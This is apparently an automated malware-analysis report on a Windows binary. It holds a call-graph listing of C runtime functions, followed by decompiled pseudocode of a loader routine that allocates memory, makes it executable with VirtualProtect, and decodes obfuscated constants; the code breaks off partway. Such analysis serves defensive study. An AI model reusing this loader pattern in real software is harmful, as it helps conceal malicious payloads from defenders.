__dosmaperr 68 API calls 10644->10647 10648 411561 10645->10648 10649 411587 10645->10649 10646 4077db __invoke_watson 5 API calls 10650 411be8 10646->10650 10651 4114fd 10647->10651 10652 407f6a __dosmaperr 68 API calls 10648->10652 10653 41159b 10649->10653 10656 410fcd __lseeki64_nolock 70 API calls 10649->10656 10650->10558 10654 407f57 __dosmaperr 68 API calls 10651->10654 10655 411566 10652->10655 10658 410b1d __write_nolock 68 API calls 10653->10658 10657 411504 10654->10657 10659 407f57 __dosmaperr 68 API calls 10655->10659 10656->10653 10660 406d3e __strnicmp_l 6 API calls 10657->10660 10661 4115a6 10658->10661 10662 41156f 10659->10662 10660->10674 10663 41184c 10661->10663 10665 409f6c __getptd 68 API calls 10661->10665 10664 406d3e __strnicmp_l 6 API calls 10662->10664 10666 411b1b WriteFile 10663->10666 10667 41185c 10663->10667 10664->10674 10668 4115c1 GetConsoleMode 10665->10668 10669 411b4e GetLastError 10666->10669 10696 41182e 10666->10696 10670 41193a 10667->10670 10690 411870 10667->10690 10668->10663 10672 4115ec 10668->10672 10669->10696 10688 411a1a 10670->10688 10692 411949 10670->10692 10671 411b99 10671->10674 10675 407f57 __dosmaperr 68 API calls 10671->10675 10672->10663 10673 4115fe GetConsoleCP 10672->10673 10687 411621 10673->10687 10673->10696 10674->10646 10678 411bbc 10675->10678 10676 411b6c 10680 411b77 10676->10680 10681 411b8b 10676->10681 10677 4118de WriteFile 10677->10669 10677->10690 10684 407f6a __dosmaperr 68 API calls 10678->10684 10679 411a80 WideCharToMultiByte 10679->10669 10686 411ab7 WriteFile 10679->10686 10685 407f57 __dosmaperr 68 API calls 10680->10685 10683 407f7d __dosmaperr 68 API calls 10681->10683 10682 4119be WriteFile 10682->10669 10682->10692 10683->10674 10684->10674 10691 411b7c 10685->10691 10686->10688 10689 411aee GetLastError 10686->10689 10687->10669 10693 410d58 __write_nolock 78 API calls 10687->10693 10695 416911 11 API calls __putwch_nolock 10687->10695 10687->10696 10697 4116cd WideCharToMultiByte 10687->10697 10698 416aed 80 API calls __fassign 10687->10698 10700 411752 WriteFile 10687->10700 10688->10671 10688->10679 10688->10686 10688->10696 10689->10688 10690->10671 10690->10677 10690->10696 10694 407f6a __dosmaperr 68 API calls 10691->10694 10692->10671 10692->10682 10692->10696 10693->10687 10694->10674 10695->10687 10696->10671 10696->10674 10696->10676 10697->10696 10699 4116fe WriteFile 10697->10699 10698->10687 10699->10669 10699->10687 10700->10669 10700->10687 10702 41618e __unlock_fhandle LeaveCriticalSection 10701->10702 10703 411cc4 10702->10703 10703->10589 10704->10470 10706 40b156 LeaveCriticalSection 10705->10706 10707 40b137 10705->10707 10706->10323 10707->10706 10708 40b13e 10707->10708 10711 40da73 LeaveCriticalSection 10708->10711 10710 40b153 10710->10323 10711->10710 10713 4068cd 10712->10713 10716 409888 __ctrlfp __floor_pentium4 10712->10716 10714 4068fe 10713->10714 10713->10716 10721 406948 10714->10721 10723 4095d8 10714->10723 10715 4098f5 __floor_pentium4 10720 4098e2 __ctrlfp 10715->10720 10739 4101ae 10715->10739 10716->10715 10719 4098d2 10716->10719 10716->10720 10732 410159 10719->10732 10720->10192 10721->10192 10724 40960e 10723->10724 10728 409619 10723->10728 10725 409d20 __decode_pointer 6 API calls 10724->10725 10725->10728 10726 4096f0 10727 4096ac 10726->10727 10730 407f57 __dosmaperr 68 API calls 10726->10730 10727->10721 10728->10726 10728->10727 10729 40966a 10728->10729 10729->10727 10731 407f57 __dosmaperr 68 API calls 10729->10731 10730->10727 10731->10727 10733 410167 10732->10733 10734 41018f 10732->10734 10748 4100b9 10733->10748 10736 407f57 __dosmaperr 68 API calls 10734->10736 10738 410194 __ctrlfp 10736->10738 10737 41018a 10737->10720 10738->10720 10740 4101e4 __raise_exc __handle_exc __except1 10739->10740 10741 41024c 10740->10741 10742 410225 10740->10742 10743 410058 __87except 68 API calls 10741->10743 10744 4100b9 __umatherr 68 API calls 10742->10744 10745 410247 __ctrlfp 10743->10745 10744->10745 10746 4077db __invoke_watson 5 API calls 10745->10746 10747 410270 10746->10747 10747->10720 10749 4100c3 10748->10749 10750 41013c __ctrlfp 10749->10750 10753 4100de __87except __ctrlfp 10749->10753 10751 410058 __87except 68 API calls 10750->10751 10752 410151 10751->10752 10752->10737 10754 41012c 10753->10754 10756 410058 10753->10756 10754->10737 10757 410063 10756->10757 10758 410078 10756->10758 10759 41007d 10757->10759 10761 407f57 __dosmaperr 68 API calls 10757->10761 10760 407f57 __dosmaperr 68 API calls 10758->10760 10759->10754 10760->10759 10762 410070 10761->10762 10762->10754 10764 40c102 10763->10764 10765 40733b 10763->10765 10766 407f57 __dosmaperr 68 API calls 10764->10766 10765->10194 10765->10198 10767 40c107 10766->10767 10768 406d3e __strnicmp_l 6 API calls 10767->10768 10768->10765 10770 40c0f3 __fileno 68 API calls 10769->10770 10771 40b1a0 10770->10771 10817 410b1d 10771->10817 10773 40b1f3 10773->10206 10774 40b1a6 __flsbuf 10774->10773 10775 4104e4 __malloc_crt 68 API calls 10774->10775 10775->10773 10777 40c59e 10776->10777 10780 40c57d 10776->10780 10777->10212 10778 40c589 10779 407f57 __dosmaperr 68 API calls 10778->10779 10781 40c58e 10779->10781 10780->10777 10780->10778 10787 40c5bc ___crtGetEnvironmentStringsA 10780->10787 10782 406d3e __strnicmp_l 6 API calls 10781->10782 10782->10777 10783 40c407 __flsbuf 102 API calls 10783->10787 10785 40c0f3 __fileno 68 API calls 10785->10787 10786 411bea __locking 102 API calls 10786->10787 10787->10777 10787->10783 10787->10785 10787->10786 10826 41098a 10787->10826 10789 40c0f3 __fileno 68 API calls 10788->10789 10790 40c417 10789->10790 10791 40c422 10790->10791 10792 40c439 10790->10792 10793 407f57 __dosmaperr 68 API calls 10791->10793 10794 40c43d 10792->10794 10796 40c44a __flsbuf 10792->10796 10797 40c427 10793->10797 10795 407f57 __dosmaperr 68 API calls 10794->10795 10795->10797 10796->10797 10803 410b1d __write_nolock 68 API calls 10796->10803 10805 40c4a0 10796->10805 10808 40c4ab 10796->10808 10797->10208 10798 40c53a 10800 411bea __locking 102 API calls 10798->10800 10799 40c4ba 10801 40c4d1 10799->10801 10804 40c4ee 10799->10804 10800->10797 10802 411bea __locking 102 API calls 10801->10802 10802->10797 10803->10805 10804->10797 10835 411052 10804->10835 10805->10808 10832 411cc6 10805->10832 10808->10798 10808->10799 10810 40b238 10809->10810 10811 40741d 10809->10811 10810->10811 10812 41098a __flush 102 API calls 10810->10812 10813 407434 10811->10813 10812->10811 10814 407439 __flsbuf 10813->10814 10815 40b162 __getstream 2 API calls 10814->10815 10816 407444 10815->10816 10816->10202 10818 410b39 10817->10818 10819 410b2a 10817->10819 10821 407f57 __dosmaperr 68 API calls 10818->10821 10824 410b5d 10818->10824 10820 407f57 __dosmaperr 68 API calls 10819->10820 10822 410b2f 10820->10822 10823 410b4d 10821->10823 10822->10774 10825 406d3e __strnicmp_l 6 API calls 10823->10825 10824->10774 10825->10824 10827 4109c5 10826->10827 10828 4109a3 10826->10828 10827->10787 10828->10827 10829 40c0f3 __fileno 68 API calls 10828->10829 10830 4109be 10829->10830 10831 411bea __locking 102 API calls 10830->10831 10831->10827 10833 4104e4 __malloc_crt 68 API calls 10832->10833 10834 411cdb 10833->10834 10834->10808 10836 41105e _fprintf 10835->10836 10837 41108b 10836->10837 10838 41106f 10836->10838 10839 411099 10837->10839 10841 4110ba 10837->10841 10840 407f6a __dosmaperr 68 API calls 10838->10840 10842 407f6a __dosmaperr 68 API calls 10839->10842 10843 411074 10840->10843 10845 411100 10841->10845 10846 4110da 10841->10846 10844 41109e 10842->10844 10847 407f57 __dosmaperr 68 API calls 10843->10847 10849 407f57 __dosmaperr 68 API calls 10844->10849 10848 4160ee ___lock_fhandle 69 API calls 10845->10848 10850 407f6a __dosmaperr 68 API calls 10846->10850 10854 41107c _fprintf 10847->10854 10851 411106 10848->10851 10852 4110a5 10849->10852 10853 4110df 10850->10853 10855 411113 10851->10855 10856 41112f 10851->10856 10857 406d3e __strnicmp_l 6 API calls 10852->10857 10858 407f57 __dosmaperr 68 API calls 10853->10858 10854->10797 10859 410fcd __lseeki64_nolock 70 API calls 10855->10859 10860 407f57 __dosmaperr 68 API calls 10856->10860 10857->10854 10861 4110e6 10858->10861 10863 411124 10859->10863 10864 411134 10860->10864 10862 406d3e __strnicmp_l 6 API calls 10861->10862 10862->10854 10867 411161 10863->10867 10865 407f6a __dosmaperr 68 API calls 10864->10865 10865->10863 10870 41618e LeaveCriticalSection 10867->10870 10869 411169 10869->10854 10870->10869 10874 40669a 10871->10874 10873 405521 10873->10217 10878 4066aa ___crtGetEnvironmentStringsA 10874->10878 10879 4066ae _memset 10874->10879 10875 4066b3 10876 407f57 __dosmaperr 68 API calls 10875->10876 10877 4066b8 10876->10877 10881 406d3e __strnicmp_l 6 API calls 10877->10881 10878->10873 10879->10875 10879->10878 10880 4066fd 10879->10880 10880->10878 10882 407f57 __dosmaperr 68 API calls 10880->10882 10881->10878 10882->10877 10884 40c3c4 _fprintf 10883->10884 10891 40b0b3 10884->10891 10890 40c3f4 _fprintf 10890->10226 10892 40b0c5 10891->10892 10893 40b0e7 EnterCriticalSection 10891->10893 10892->10893 10894 40b0cd 10892->10894 10895 40b0dd 10893->10895 10896 40db4d __lock 68 API calls 10894->10896 10897 40c31c 10895->10897 10896->10895 10898 40c3a6 10897->10898 10899 40c32d 10897->10899 10901 407f57 __dosmaperr 68 API calls 10898->10901 10899->10898 10900 40c33e 10899->10900 10903 40c34f 10900->10903 10913 41116b 10900->10913 10902 40c398 10901->10902 10910 40c3fd 10902->10910 10904 41098a __flush 102 API calls 10903->10904 10906 40c35e 10904->10906 10907 40c0f3 __fileno 68 API calls 10906->10907 10908 40c391 10907->10908 10909 411052 __lseeki64 72 API calls 10908->10909 10909->10902 10911 40b126 _fprintf 2 API calls 10910->10911 10912 40c405 10911->10912 10912->10890 10914 41117a __write_nolock 10913->10914 10915 40c0f3 __fileno 68 API calls 10914->10915 10916 411190 10915->10916 10917 411052 __lseeki64 72 API calls 10916->10917 10918 4111ad 10917->10918 10919 411390 10918->10919 10920 411236 10918->10920 10935 4111c8 10918->10935 10921 411394 10919->10921 10928 41135c 10919->10928 10923 41124e 10920->10923 10920->10928 10924 407f57 __dosmaperr 68 API calls 10921->10924 10922 4077db __invoke_watson 5 API calls 10925 4114b5 10922->10925 10926 411052 __lseeki64 72 API calls 10923->10926 10923->10935 10924->10935 10925->10903 10927 41127e 10926->10927 10930 4112a1 ReadFile 10927->10930 10927->10935 10929 411052 __lseeki64 72 API calls 10928->10929 10928->10935 10931 4113e2 10929->10931 10932 4112c6 10930->10932 10930->10935 10933 411052 __lseeki64 72 API calls 10931->10933 10931->10935 10934 411052 __lseeki64 72 API calls 10932->10934 10933->10935 10934->10935 10935->10922 10937 4089c3 _LocaleUpdate::_LocaleUpdate 78 API calls 10936->10937 10938 40b36e 10937->10938 10939 40b372 10938->10939 10942 40c0f3 __fileno 68 API calls 10938->10942 10944 40b3b3 __output_l __aulldvrm _strlen 10938->10944 10940 407f57 __dosmaperr 68 API calls 10939->10940 10941 40b377 10940->10941 10943 406d3e __strnicmp_l 6 API calls 10941->10943 10942->10944 10945 40b389 10943->10945 10944->10939 10944->10945 10949 40b261 102 API calls _write_multi_char 10944->10949 10950 4079a1 ___endstdio 68 API calls 10944->10950 10951 40b2ba 102 API calls _write_string 10944->10951 10952 409d20 6 API calls __decode_pointer 10944->10952 10953 410d03 80 API calls __cftof 10944->10953 10954 4104e4 __malloc_crt 68 API calls 10944->10954 10955 40b294 102 API calls _write_multi_char 10944->10955 10959 410d20 10944->10959 10946 4077db __invoke_watson 5 API calls 10945->10946 10947 407277 10946->10947 10947->10243 10949->10944 10950->10944 10951->10944 10952->10944 10953->10944 10954->10944 10955->10944 10957 40b126 _fprintf 2 API calls 10956->10957 10958 4072a1 10957->10958 10958->10240 10960 4089c3 _LocaleUpdate::_LocaleUpdate 78 API calls 10959->10960 10961 410d33 10960->10961 10961->10944 10965 405912 10962->10965 10968 40583e 10965->10968 10969 405858 10968->10969 10970 405848 10968->10970 10969->10970 10971 405864 10969->10971 10978 406b56 10970->10978 10990 40652d 10971->10990 10977 405889 10980 406b60 10978->10980 10979 4078d7 _malloc 68 API calls 10979->10980 10980->10979 10981 405855 10980->10981 10982 409c75 _malloc 6 API calls 10980->10982 10984 406b7c std::bad_alloc::bad_alloc 10980->10984 10981->10254 10982->10980 10987 409c4f __cinit 75 API calls 10984->10987 10989 406ba2 10984->10989 10986 406bbb __CxxThrowException@8 RaiseException 10988 406bba 10986->10988 10987->10989 10999 40588a 10989->10999 10991 406546 _strlen 10990->10991 10992 405874 10990->10992 10993 4078d7 _malloc 68 API calls 10991->10993 10996 406bbb 10992->10996 10994 406555 10993->10994 10994->10992 10995 407820 _strcpy_s 68 API calls 10994->10995 10995->10992 10997 406bf0 RaiseException 10996->10997 10998 406be4 10996->10998 10997->10977 10998->10997 11002 40659d 10999->11002 11003 405896 11002->11003 11004 4065bd _strlen 11002->11004 11003->10986 11004->11003 11005 4078d7 _malloc 68 API calls 11004->11005 11006 4065d0 11005->11006 11006->11003 11007 407820 _strcpy_s 68 API calls 11006->11007 11007->11003 11009 406d3e __strnicmp_l 6 API calls 11008->11009 11010 406d70 11009->11010 11010->10257 11012 405a1c 11011->11012 11014 405a25 ctype 11011->11014 11015 4059f9 11012->11015 11014->10261 11018 4059a7 11015->11018 11019 4059af 11018->11019 11020 4059bf 11019->11020 11022 405987 11019->11022 11020->11014 11023 4058c7 68 API calls 11022->11023 11024 405993 ctype 11023->11024 11024->11019 11027 40d44c 11025->11027 11026 412e43 _parse_cmdline 78 API calls 11026->11027 11027->11026 11029 40d4b9 11027->11029 11028 40d5b7 11028->9223 11028->9225 11029->11028 11030 412e43 78 API calls _parse_cmdline 11029->11030 11030->11029 11032 40cdf3 _fprintf 11031->11032 11033 40db4d __lock 68 API calls 11032->11033 11034 40cdfa 11033->11034 11037 409d20 __decode_pointer 6 API calls 11034->11037 11041 40ceb3 __initterm 11034->11041 11039 40ce31 11037->11039 11038 40cefb _fprintf 11038->9230 11039->11041 11043 409d20 __decode_pointer 6 API calls 11039->11043 11048 40cefe 11041->11048 11042 40cef2 11044 40ccf7 _doexit 3 API calls 11042->11044 11047 40ce46 11043->11047 11044->11038 11045 409d17 7 API calls ___crtMessageBoxW 11045->11047 11046 409d20 6 API calls __decode_pointer 11046->11047 11047->11041 11047->11045 11047->11046 11049 40cf04 11048->11049 11050 40cedf 11048->11050 11053 40da73 LeaveCriticalSection 11049->11053 11050->11038 11052 40da73 LeaveCriticalSection 11050->11052 11052->11042 11053->11050

                        Control-flow Graph

                        C-Code - Quality: 78%
                        			E00405A6B(void* __fp0) {
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				void* _t596;
                        				long _t600;
                        				void* _t603;
                        				struct HINSTANCE__* _t608;
                        				intOrPtr _t613;
                        				intOrPtr* _t623;
                        				intOrPtr* _t643;
                        				intOrPtr* _t645;
                        				intOrPtr* _t648;
                        				void* _t783;
                        				void* _t785;
                        				void* _t788;
                        				void* _t797;
                        				signed int _t799;
                        				long _t800;
                        				void* _t845;
                        				void* _t848;
                        				void* _t849;
                        				void* _t850;
                        				intOrPtr* _t855;
                        				void* _t857;
                        				intOrPtr* _t858;
                        				long _t869;
                        				void* _t871;
                        				void* _t883;
                        
                        				_t883 = __fp0;
                        				_t858 = _t857 - 0x74;
                        				E00407168(E004176DE, _t855);
                        				E00406B10(0x1708);
                        				 *0x42e648 =  *0x41b80c; // executed
                        				_t596 = GlobalAlloc(0,  *0x42e644); // executed
                        				 *0x42dc24 = _t596;
                        				VirtualProtect(_t596,  *0x42e644, 0x40, _t855 + 0x70); // executed
                        				_t845 = 0;
                        				while(1) {
                        					GetLastError();
                        					if(_t845 < 0x129adee) {
                        						 *((intOrPtr*)(_t855 + 0x48)) = 0x16b700e0;
                        						 *((intOrPtr*)(_t855 - 0xa4)) = 0x729fb588;
                        						 *((intOrPtr*)(_t855 + 0x34)) = 0x77dc540a;
                        						 *((intOrPtr*)(_t855 + 0x68)) = 0x3cce353c;
                        						 *((intOrPtr*)(_t855 + 0x10)) = 0x7e9bacb0;
                        						 *((intOrPtr*)(_t855 - 0x9c)) = 0x1db2bd3d;
                        						 *((intOrPtr*)(_t855 - 0x84)) = 0x20627d21;
                        						 *((intOrPtr*)(_t855 - 0x1c)) = 0x3f6ac131;
                        						 *((intOrPtr*)(_t855 - 0x58)) = 0x4429947a;
                        						 *((intOrPtr*)(_t855 - 0x18)) = 0x5a1efe77;
                        						 *((intOrPtr*)(_t855 - 0x48)) = 0x4f98a507;
                        						 *((intOrPtr*)(_t855 - 0x10)) = 0x132dd8ea;
                        						 *((intOrPtr*)(_t855 - 0x68)) = 0x3c255f10;
                        						 *((intOrPtr*)(_t855 + 0x3c)) = 0x36416eaf;
                        						 *((intOrPtr*)(_t855 - 0x8c)) = 0xe14f715;
                        						 *((intOrPtr*)(_t855 - 0x6c)) = 0x7d5c34bd;
                        						 *((intOrPtr*)(_t855 + 0x44)) = 0x28df196a;
                        						 *((intOrPtr*)(_t855 + 0x18)) = 0x37dcb12c;
                        						 *((intOrPtr*)(_t855 - 0x3c)) = 0x72fc7d09;
                        						 *((intOrPtr*)(_t855 + 0x60)) = 0x5147c96c;
                        						 *(_t855 - 0x90) = 0x704b32f3;
                        						 *((intOrPtr*)(_t855 + 0x38)) = 0x5f8f1819;
                        						 *((intOrPtr*)(_t855 + 0x50)) = 0x27a76e55;
                        						 *((intOrPtr*)(_t855 - 0x40)) = 0x22fa090;
                        						 *((intOrPtr*)(_t855 - 0x38)) = 0x670e8118;
                        						 *((intOrPtr*)(_t855 + 4)) = 0xe01cd9b;
                        						 *((intOrPtr*)(_t855 - 0x30)) = 0x3c082c18;
                        						 *((intOrPtr*)(_t855 - 0xa8)) = 0x3ecf8779;
                        						 *(_t855 + 0x6c) = 0x3686b744;
                        						 *((intOrPtr*)(_t855 - 0x28)) = 0x38c96a6e;
                        						 *((intOrPtr*)(_t855 + 8)) = 0x1dd9dcf9;
                        						 *((intOrPtr*)(_t855 + 0xc)) = 0x3f99f2e3;
                        						 *((intOrPtr*)(_t855 - 0x98)) = 0x76152ab6;
                        						 *((intOrPtr*)(_t855 - 0x44)) = 0x35d35e74;
                        						 *((intOrPtr*)(_t855 - 0x74)) = 0x7f54c16b;
                        						 *((intOrPtr*)(_t855 + 0x14)) = 0x3ed4b651;
                        						 *((intOrPtr*)(_t855 + 0x28)) = 0x626e8506;
                        						 *((intOrPtr*)(_t855 - 0x2c)) = 0x5edd1c6f;
                        						 *((intOrPtr*)(_t855 - 0x5c)) = 0x7467e854;
                        						 *((intOrPtr*)(_t855 + 0x40)) = 0x678283b1;
                        						 *((intOrPtr*)(_t855 + 0x1c)) = 0x7774bd03;
                        						 *((intOrPtr*)(_t855 + 0x4c)) = 0x34eec2c0;
                        						 *((intOrPtr*)(_t855 + 0x58)) = 0x23ee5613;
                        						 *((intOrPtr*)(_t855 - 0xa0)) = 0x7710f6f;
                        						 *((intOrPtr*)(_t855 - 0x54)) = 0x4aa513f0;
                        						 *((intOrPtr*)(_t855 - 0x14)) = 0x14c03604;
                        						 *((intOrPtr*)(_t855 - 0x50)) = 0x709d39b2;
                        						 *((intOrPtr*)(_t855 - 0x88)) = 0x2d9fc390;
                        						 *((intOrPtr*)(_t855 - 0x4c)) = 0xdc26664;
                        						 *((intOrPtr*)(_t855 - 0x60)) = 0xef0aa3c;
                        						 *((intOrPtr*)(_t855 - 0x7c)) = 0x59d10e2f;
                        						 *((intOrPtr*)(_t855 - 0x80)) = 0xdb5b201;
                        						 *((intOrPtr*)(_t855 - 0x64)) = 0x3d00c619;
                        						 *((intOrPtr*)(_t855 - 0x34)) = 0x2ee3cb51;
                        						 *((intOrPtr*)(_t855 - 0x78)) = 0x5c1ad1e2;
                        						 *((intOrPtr*)(_t855 + 0x74)) = 0x6d5a82ad;
                        						 *((intOrPtr*)(_t855 + 0x24)) = 0x6415b55c;
                        						 *((intOrPtr*)(_t855 + 0x20)) = 0x43086827;
                        						 *((intOrPtr*)(_t855 + 0x54)) = 0x42d3b3fd;
                        						 *((intOrPtr*)(_t855 + 0x2c)) = 0x8ebf9f3;
                        						 *((intOrPtr*)(_t855 + 0x64)) = 0x3289be56;
                        						 *((intOrPtr*)(_t855 - 0x20)) = 0x198f9d06;
                        						 *((intOrPtr*)(_t855 - 0x24)) = 0x51e34c97;
                        						 *_t855 = 0x3238d997;
                        						 *((intOrPtr*)(_t855 + 0x5c)) = 0x2afa9fe6;
                        						 *((intOrPtr*)(_t855 + 0x30)) = 0x274f0a8c;
                        						 *((intOrPtr*)(_t855 - 0x70)) = 0x5900053b;
                        						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x4a11786;
                        						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) + 0x4560716b;
                        						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) - 0x72fd1c75;
                        						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x2a2e8e8;
                        						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x1e649d84;
                        						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) - 0x1adfd311;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x3f0a0b7;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x31fc1696;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x5e14f9c9;
                        						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) + 0xd42e0;
                        						 *((intOrPtr*)(_t855 + 0x10)) =  *((intOrPtr*)(_t855 + 0x10)) - 0x3c18d7b7;
                        						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) - 0x2002a17a;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) + 0x66fa3a6b;
                        						 *((intOrPtr*)(_t855 - 0x9c)) =  *((intOrPtr*)(_t855 - 0x9c)) + 0x7644be02;
                        						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) - 0x38077f3b;
                        						 *((intOrPtr*)(_t855 - 0x84)) =  *((intOrPtr*)(_t855 - 0x84)) + 0x6861ed43;
                        						 *((intOrPtr*)(_t855 + 0x10)) =  *((intOrPtr*)(_t855 + 0x10)) + 0x2149ea17;
                        						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x42dd5e39;
                        						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) + 0x3fde49f0;
                        						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) + 0x24c6ffa8;
                        						 *((intOrPtr*)(_t855 - 0x84)) =  *((intOrPtr*)(_t855 - 0x84)) + 0x1057b77;
                        						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) - 0x49b1f22e;
                        						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) + 0x53f6c871;
                        						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x31e78741;
                        						 *((intOrPtr*)(_t855 - 0x9c)) =  *((intOrPtr*)(_t855 - 0x9c)) + 0x3718ba5b;
                        						 *((intOrPtr*)(_t855 + 0x10)) =  *((intOrPtr*)(_t855 + 0x10)) - 0x459675f0;
                        						 *((intOrPtr*)(_t855 - 0x18)) =  *((intOrPtr*)(_t855 - 0x18)) - 0x39fd0a2;
                        						 *((intOrPtr*)(_t855 - 0x48)) =  *((intOrPtr*)(_t855 - 0x48)) + 0x727a9530;
                        						 *((intOrPtr*)(_t855 - 0x48)) =  *((intOrPtr*)(_t855 - 0x48)) - 0x56301dce;
                        						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) - 0x485ad839;
                        						 *((intOrPtr*)(_t855 - 0x10)) =  *((intOrPtr*)(_t855 - 0x10)) - 0x6f733afe;
                        						 *((intOrPtr*)(_t855 - 0x10)) =  *((intOrPtr*)(_t855 - 0x10)) - 0x1acbf0c0;
                        						 *((intOrPtr*)(_t855 - 0x10)) =  *((intOrPtr*)(_t855 - 0x10)) + 0x6bbfcb99;
                        						 *((intOrPtr*)(_t855 - 0x8c)) =  *((intOrPtr*)(_t855 - 0x8c)) + 0x6a615b6a;
                        						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) + 0x403e4fb5;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x5ec62208;
                        						 *((intOrPtr*)(_t855 - 0x68)) =  *((intOrPtr*)(_t855 - 0x68)) + 0x39bcf23a;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x746a7ea9;
                        						 *((intOrPtr*)(_t855 - 0x68)) =  *((intOrPtr*)(_t855 - 0x68)) + 0x1b651608;
                        						 *((intOrPtr*)(_t855 + 0x3c)) =  *((intOrPtr*)(_t855 + 0x3c)) + 0x524f99ee;
                        						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) - 0x76b5296;
                        						 *((intOrPtr*)(_t855 - 0x9c)) =  *((intOrPtr*)(_t855 - 0x9c)) - 0x1ca732cc;
                        						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) + 0x4a0bd545;
                        						 *((intOrPtr*)(_t855 + 0x18)) =  *((intOrPtr*)(_t855 + 0x18)) - 0x249dac94;
                        						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) - 0x6fb1faa3;
                        						 *((intOrPtr*)(_t855 + 0x50)) =  *((intOrPtr*)(_t855 + 0x50)) - 0x50ecbeb8;
                        						 *(_t855 - 0x90) =  *(_t855 - 0x90) + 0x4d7e5689;
                        						 *((intOrPtr*)(_t855 - 0x68)) =  *((intOrPtr*)(_t855 - 0x68)) + 0x591a883a;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) + 0x78fc8c1e;
                        						 *((intOrPtr*)(_t855 - 0x8c)) =  *((intOrPtr*)(_t855 - 0x8c)) - 0x3ecbf404;
                        						 *((intOrPtr*)(_t855 + 4)) =  *((intOrPtr*)(_t855 + 4)) - 0x6fe1682;
                        						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) + 0x9e116c0;
                        						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) + 0x42f97163;
                        						 *((intOrPtr*)(_t855 + 0x3c)) =  *((intOrPtr*)(_t855 + 0x3c)) - 0x7593f15b;
                        						 *((intOrPtr*)(_t855 - 0x84)) =  *((intOrPtr*)(_t855 - 0x84)) + 0x7eef95db;
                        						 *((intOrPtr*)(_t855 + 0x50)) =  *((intOrPtr*)(_t855 + 0x50)) + 0x6c82abb3;
                        						 *((intOrPtr*)(_t855 + 0x50)) =  *((intOrPtr*)(_t855 + 0x50)) - 0x6508f030;
                        						 *((intOrPtr*)(_t855 - 0x98)) =  *((intOrPtr*)(_t855 - 0x98)) - 0x1c707926;
                        						 *((intOrPtr*)(_t855 + 0x10)) =  *((intOrPtr*)(_t855 + 0x10)) - 0x21ba796a;
                        						 *((intOrPtr*)(_t855 + 0x44)) =  *((intOrPtr*)(_t855 + 0x44)) - 0x495bf23b;
                        						 *((intOrPtr*)(_t855 + 0x18)) =  *((intOrPtr*)(_t855 + 0x18)) + 0x4af4edd1;
                        						 *((intOrPtr*)(_t855 + 0x3c)) =  *((intOrPtr*)(_t855 + 0x3c)) + 0x5367e117;
                        						 *((intOrPtr*)(_t855 - 0x98)) =  *((intOrPtr*)(_t855 - 0x98)) + 0x300e1081;
                        						 *((intOrPtr*)(_t855 + 8)) =  *((intOrPtr*)(_t855 + 8)) + 0x32361f60;
                        						 *((intOrPtr*)(_t855 - 0x44)) =  *((intOrPtr*)(_t855 - 0x44)) - 0x70fde692;
                        						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x103a5e93;
                        						 *((intOrPtr*)(_t855 - 0x5c)) =  *((intOrPtr*)(_t855 - 0x5c)) + 0x529fcf39;
                        						 *((intOrPtr*)(_t855 + 0x38)) =  *((intOrPtr*)(_t855 + 0x38)) + 0x7c9f7835;
                        						 *((intOrPtr*)(_t855 + 0x14)) =  *((intOrPtr*)(_t855 + 0x14)) - 0x708c25b4;
                        						 *(_t855 - 0x90) =  *(_t855 - 0x90) + 0x36d67e57;
                        						 *((intOrPtr*)(_t855 + 0xc)) =  *((intOrPtr*)(_t855 + 0xc)) - 0x57fb3c02;
                        						 *((intOrPtr*)(_t855 + 0x40)) =  *((intOrPtr*)(_t855 + 0x40)) - 0x3f99fb2a;
                        						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) - 0x74f97a90;
